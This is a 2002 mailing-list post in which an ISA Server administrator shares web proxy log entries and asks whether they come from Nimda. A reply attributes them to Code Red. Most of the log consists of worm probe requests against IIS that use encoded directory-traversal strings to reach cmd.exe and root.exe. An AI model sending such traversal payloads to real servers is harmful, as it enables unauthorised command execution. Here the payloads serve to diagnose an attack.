It looks more like a codered attack.
-----Original Message-----
From: Rogers, Brian [mailto:RogersB@xxxxxxxxxxxxxx]
Sent: Wednesday, January 09, 2002 2:39 PM
To: [ISAserver.org Discussion List]
Subject: [isalist] Any ideas on this entry in my Web proxy log?
http://www.ISAserver.org
Im finding a lot of these in my Web Proxy log on my ISA server
from various External IP addresses. Would this be nimda/goner/etc
related?
My ISA server does not even run IIS.
12.14.65.42 anonymous - 2002-01-09 16:40:24
ISASERVER - www - - - 72 -
- GET http://www/scripts/root.exe?/c+dir - 12202
12.14.65.42 anonymous - 2002-01-09 16:40:25
ISASERVER - www - - - 70 -
- GET http://www/MSADC/root.exe?/c+dir - 12202
12.14.65.42 anonymous - 2002-01-09 16:40:25
ISASERVER - www - - - 80 -
- GET http://www/c/winnt/system32/cmd.exe?/c+dir -
12202
12.14.65.42 anonymous - 2002-01-09 16:40:25
ISASERVER - www - - - 80 -
- GET http://www/d/winnt/system32/cmd.exe?/c+dir -
12202
12.14.65.42 anonymous - 2002-01-09 16:40:26
ISASERVER - www - - - 96 -
- GET
http://www/scripts/..%255c../winnt/system32/cmd.exe?/c+dir -
12202
12.14.65.42 anonymous - 2002-01-09 16:40:26
ISASERVER - www - - - 117 -
- GET
http://www/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe
?/c+dir - 12202
12.14.65.42 anonymous - 2002-01-09 16:40:26
ISASERVER - www - - - 117 -
- GET
http://www/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe
?/c+dir - 12202
12.14.65.42 anonymous - 2002-01-09 16:40:26
ISASERVER - www - - - 145 -
- GET
http://www/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1
%1c../winnt/system32/cmd.exe?/c+dir - 12202
12.14.65.42 anonymous - 2002-01-09 16:40:27
ISASERVER - www - - - 97 -
- GET
http://www/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir -
12202
12.14.65.42 anonymous - 2002-01-09 16:40:27
ISASERVER - www - - - 97 -
- GET
http://www/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir -
12202
12.14.65.42 anonymous - 2002-01-09 16:40:27
ISASERVER - www - - - 97 -
- GET
http://www/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir -
12202
12.14.65.42 anonymous - 2002-01-09 16:40:27
ISASERVER - www - - - 97 -
- GET
http://www/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir -
12202
12.14.65.42 anonymous - 2002-01-09 16:40:28
ISASERVER - www - - - 98 -
- GET
http://www/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir -
12202
12.14.65.42 anonymous - 2002-01-09 16:40:28
ISASERVER - www - - - 96 -
- GET
http://www/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir -
12202
12.14.65.42 anonymous - 2002-01-09 16:40:28
ISASERVER - www - - - 100 -
- GET
http://www/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir -
12202
12.14.65.42 anonymous - 2002-01-09 16:40:28
ISASERVER - www - - - 96 -
- GET
http://www/scripts/..%252f../winnt/system32/cmd.exe?/c+dir -
12202
Brian W. Rogers
MCSE, MCT, MCP
Client/Server Network Developer
Tree of Life Corporation
rogersb@xxxxxxxxxxxxxx
office: (904)940-2152
mobile: (904)806-7173
------------------------------------------------------
You are currently subscribed to this ISAserver.org Discussion
List as: scott.anderson@xxxxxxxxxxxxxxx
To unsubscribe send a blank email to
$subst('Email.Unsub')
